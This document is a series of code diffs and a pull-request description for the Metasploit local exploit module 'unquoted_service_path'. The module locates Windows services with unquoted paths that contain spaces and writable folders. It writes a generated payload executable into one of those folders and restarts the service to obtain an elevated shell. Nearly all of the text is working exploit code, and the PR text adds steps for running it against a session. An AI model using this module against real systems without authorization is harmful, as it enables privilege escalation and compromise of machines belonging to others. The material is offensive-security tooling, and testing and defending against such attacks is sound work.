+        print_status("Attempting to write #{exe.length} bytes to #{@exe_path}...")
+        write_file(@exe_path, exe)
+        print_good("Manual cleanup of #{@exe_path} is required due to a potential reboot for exploitation.")
         print_good 'Successfully wrote payload'
         #
         # Run the service, let the Windows API do the rest
         #
-        print_status("Launching service #{svr_name}...")
-        print_status("Manual cleanup of the payload file is required. #{svr_name} will fail to start as long as the payload remains on disk.")
-        unless service_restart(svr_name)
-          print_error 'Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!'
+        print_status("Launching service #{svrs['name']}...")
+        print_status("Manual cleanup of the payload file is required. #{svrs['name']} will fail to start as long as the payload remains on disk.")
+        begin
+          unless service_restart(svrs['name'])
+            print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
+          end
+        rescue RuntimeError # service_restart throws this error when it doesn't have permission
+          print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
+          print_status("Waiting #{wfs_delay} seconds for shell to arrive")
         end
-
-        break
+        # break
       end
-      # rubocop:enable Lint/UnreachableLoop
     end
+  end
+
+  def cleanup
+    print_status "Attempting to delete payload: #{@exe_path}"
+    rm_f(@exe_path)
+    super
   end
 end

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -71,14 +71,12 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    services.each do |svrs|
-      fpath = svrs[1].split(' ')[0...-1] # cut off the .exe last portion
-      unless generate_folders(fpath, datastore['QUICK']).empty?
-        # Found service is running system with writable path
-        return CheckCode::Vulnerable
-      end
+    vulns = []
+    services.each do |srv|
+      vulns << srv['name']
     end
-    CheckCode::Safe
+
+    CheckCode::Vulnerable("Exploitable services: #{vulns.join(', ')}")
   end
 
   ###

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Services
+  include Msf::Exploit::Retry
 
   def initialize(info = {})
     super(
@@ -59,24 +60,15 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    register_options([
-      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
-    ])
   end
 
   def check
-    quick_banner
-    services = enum_vuln_services
+    services = enum_vuln_services.map { |srv| srv['name'] }
     if services.empty?
       return CheckCode::Safe
     end
 
-    vulns = []
-    services.each do |srv|
-      vulns << srv['name']
-    end
-
-    CheckCode::Vulnerable("Exploitable services: #{vulns.join(', ')}")
+    CheckCode::Vulnerable("Vulnerable services: #{services.join(', ')}")
   end
 
   ###
@@ -90,12 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
   # C:\Program
   ###
 
-  def generate_folders(fpath)
+  def generate_folders(fpath, &block)
     potential_paths = []
     checked_paths = []
+    finished = false
     fpath.reverse.each do |x|
       path = fpath[0..fpath.index(x)].join(' ')
-      # when we test writability, we drop off last part since thats the file name
+      # when we test writability, we drop off last part since that is the file name
       path_no_file = path.split('\\')[0...-1].join('\\')
 
       next if checked_paths.include? path_no_file
@@ -106,14 +99,16 @@ class MetasploitModule < Msf::Exploit::Local
         next
       end
       vprint_good("    #{path_no_file}\\ is writable")
-      # include file name for the path
+
+      finished = block.call(path)
       potential_paths << path
-      return potential_paths if datastore['QUICK']
+      break if finished
     end
-    potential_paths
+
+    [potential_paths, finished]
   end
 
-  def enum_vuln_services
+  def enum_vuln_services(&block)
     vuln_services = []
 
     each_service do |service|
@@ -138,18 +133,13 @@ class MetasploitModule < Msf::Exploit::Local
       }
       fpath = cmd.split(' ')[0...-1] # cut off the .exe last portion
       vprint_status('  Enumerating vulnerable paths')
-      serv['paths'] = generate_folders(fpath)
-
-      # don't bother saving if we didn't find any vuln paths
-      if serv['paths'].empty?
-        vprint_error('Ignoring unexploitable service')
-      else
-        vuln_services << serv
+      serv['paths'], finished = generate_folders(fpath) do |path|
+        block.call(service[:name], path) if block_given?
       end
 
-      # This process can be pretty damn slow.
-      # Allow the user to just find one, and get the hell out.
-      break if !vuln_services.empty? && datastore['QUICK']
+      # don't bother saving if we didn't find any vuln paths
+      vuln_services << serv unless serv['paths'].empty?
+      break if finished
     end
 
     vuln_services
@@ -168,55 +158,45 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def quick_banner
-    return unless datastore['QUICK']
-
-    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
-    print_error('QUICK option is enabled. If an exploitable service is not found, try \'set QUICK false\'.')
-    print_error('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
-  end
-
   def exploit
-    quick_banner
     print_status('Finding a vulnerable service...')
-    svrs_list = enum_vuln_services
 
-    fail_with(Failure::NotVulnerable, 'No service found with trusted path issues') if svrs_list.empty?
-
-    svrs_list.each do |svrs|
-      print_status("Attempting exploitation of #{svrs['name']}")
+    @svc_exes = {}
+    enum_vuln_services do |svc_name, path|
       #
       # Drop the malicious executable into the path
       #
-      svrs['paths'].each do |path|
-        @exe_path = "#{path}.exe"
-        print_status("Placing #{@exe_path} for #{svrs['name']}")
-        exe = generate_payload_exe_service({ servicename: svrs['name'] })
-        print_status("Attempting to write #{exe.length} bytes to #{@exe_path}...")
-        write_file(@exe_path, exe)
-        print_good("Manual cleanup of #{@exe_path} is required due to a potential reboot for exploitation.")
-        print_good 'Successfully wrote payload'
-        #
-        # Run the service, let the Windows API do the rest
-        #
-        print_status("Launching service #{svrs['name']}...")
-        print_status("Manual cleanup of the payload file is required. #{svrs['name']} will fail to start as long as the payload remains on disk.")
-        begin
-          unless service_restart(svrs['name'])
-            print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
-          end
-        rescue RuntimeError # service_restart throws this error when it doesn't have permission
-          print_error 'Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
-          print_status("Waiting #{wfs_delay} seconds for shell to arrive")
-        end
-        # break
+      exe_path = "#{path}.exe"
+      print_status("      Placing #{exe_path} for #{svc_name}")
+      exe = @svc_exes[svc_name] ||= generate_payload_exe_service({ servicename: svc_name })
+      print_status("      Attempting to write #{exe.length} bytes to #{exe_path}...")
+      write_file(exe_path, exe)
+      print_good '      Successfully wrote payload'
+      register_file_for_cleanup(exe_path)
+
+      #
+      # Run the service, let the Windows API do the rest
+      #
+      if service_restart(svc_name)
+        sleep 5 # sleep a bit if restarting the service succeeded to see if any sessions are created
+      else
+        print_error '      Unable to restart service. System reboot or an admin restarting the service is required. Payload left on disk!!!'
       end
+
+      session_created? # propagated up to indicate if we're finished or not
     end
+
+    # if no exes were created, no vulnerable service paths were found
+    fail_with(Failure::NotVulnerable, 'No service found with trusted path issues') if @svc_exes.empty?
+
+    print_status("Waiting #{wfs_delay} seconds for shell to arrive") unless session_created?
   end
 
-  def cleanup
-    print_status "Attempting to delete payload: #{@exe_path}"
-    rm_f(@exe_path)
+  def service_restart(name)
+    print_status("[#{name}] Restarting service")
     super
+  rescue RuntimeError => e
+    print_error("[#{name}] Restarting service failed: #{e}")
+    false
   end
 end

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options([
-      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', true])
+      OptBool.new('QUICK', [ false, 'Stop at first vulnerable service found', false])
     ])
   end
 
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   ###
-  # this function uses a loop to go from the longest potential path (most likely with write access), to shortest.
+  # This function uses a loop to go from the longest potential path (most likely with write access), to shortest.
   # >> fpath = 'C:\\Program Files\\A Subfolder\\B Subfolder\\C Subfolder\\SomeExecutable.exe'
   # >> fpath = fpath.split(' ')[0...-1]
   # >> fpath.reverse.each { |x| puts fpath[0..fpath.index(x)].join(' ')}
@@ -95,16 +95,20 @@ class MetasploitModule < Msf::Exploit::Local
 
   def generate_folders(fpath, quick)
     potential_paths = []
+    checked_paths = []
     fpath.reverse.each do |x|
       path = fpath[0..fpath.index(x)].join(' ')
       path_no_file = path.split('\\')[0...-1].join('\\')
-      vprint_status("Checking writability to: #{path_no_file}")
+      # vprint_status("Checking writability to: #{path_no_file}")
       # when we test writability, we drop off last part since thats the file name
+      next if checked_paths.include? path_no_file
+
+      checked_paths << path_no_file
       unless writable?(path_no_file)
-        vprint_error('Path not writable')
+        vprint_error("#{path_no_file} not writable")
         next
       end
-      vprint_good('Path is writable')
+      vprint_good("#{path_no_file} is writable")
       # include file name for the path
       potential_paths << path
       return potential_paths if quick
@@ -130,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Local
       next if cmd !~ /^[a-z]:.+\.exe$/i
       next if !cmd.split('\\').map { |p| true if p =~ / / }.include?(true)
 
-      vprint_good("Found vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
+      vprint_good("Found potentially vulnerable service: #{service[:name]} - #{cmd} (#{info[:startname]})")
       vuln_services << [service[:name], cmd]
 
       # This process can be pretty damn slow.

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -98,9 +98,9 @@ class MetasploitModule < Msf::Exploit::Local
     checked_paths = []
     fpath.reverse.each do |x|
       path = fpath[0..fpath.index(x)].join(' ')
-      path_no_file = path.split('\\')[0...-1].join('\\')
-      # vprint_status("Checking writability to: #{path_no_file}")
       # when we test writability, we drop off last part since thats the file name
+      path_no_file = path.split('\\')[0...-1].join('\\')
+
       next if checked_paths.include? path_no_file
 
       checked_paths << path_no_file


### PR DESCRIPTION
This PR makes minor changes on how the `unquoted_service_path` module works.

1. print a warning banner if `quick` is set to `true` so the user has an idea they may miss some exploitable things
2. If you have a folder with multiple spaces, such as `C:\WINDOWS\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe`, `generate_folders` was checking the same folder multiple times.  It now tracks to make sure it doesn't do that.

Example of it checking a folder twice:
```
[+] Found potentially vulnerable service: NetTcpPortSharing - C:\WINDOWS\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe (NT AUTHORITY\LocalService)
[*] Attempting exploitation of NetTcpPortSharing
[*] Enumerating vulnerable paths
[-] C:\WINDOWS\Microsoft.NET\Framework64\v3.0 not writable
[-] C:\WINDOWS\Microsoft.NET\Framework64\v3.0 not writable
```

3. Slight changes to the prints to be less chatty as it isn't needed.

## Verification

- [ ] see the markdown for making a vulnerable system.  However, make a folder with 2 spaces (such as `C Sub folder`)
- [ ] Get a user shell on the windows system
- [ ] `use windows/local/unquoted_service_path`
- [ ] `set verbose true`
- [ ] `set session #`
- [ ] `run`
- [ ] You should see it only checks each folder once.

4. we now look for folders while enumerating services. Not only does this make the output cleaner (spaced in), but we can stop as soon as we find an exploitable location (per @smcintyre-r7 advice)
5. adds `cleanup` and removes the warning about payloads left on disk.  Removes an un-needed `break` and adds a `wfsdelay` to actually wait long enough for us to do whats needed.